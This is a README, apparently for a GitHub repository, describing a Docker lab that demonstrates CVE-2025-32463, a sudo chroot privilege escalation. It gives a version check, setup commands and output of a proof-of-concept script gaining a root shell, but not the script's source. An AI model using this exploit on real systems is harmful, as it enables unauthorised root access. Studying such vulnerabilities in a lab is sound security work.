本仓库提供了一个最小化、可复现的环境,用于演示 sudo 的 chroot 功能中存在的 CVE‑2025‑32463 权限提升漏洞。
在大多数 Linux 发行版中,从 sudo 1.9.14 到 1.9.17(所有 p 修订版)的易受攻击构建版本都会受到影响。
安全公告页面
| 文件 | 用途 |
|---|---|
| Dockerfile | 构建一个包含易受攻击的 sudo 1.9.16p2 和构建工具的 Ubuntu 24.04 镜像 |
| sudo‑chwoot.sh | 概念验证漏洞利用,可在 chroot 内生成一个 root shell |
| run.sh | 辅助脚本,负责构建镜像(如需)并启动漏洞利用容器 |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh 会将 --privileged 和 --rm 参数传给 Docker,以便容器在您退出时自动清理。
完成后移除镜像:
docker rmi sudo-chwoot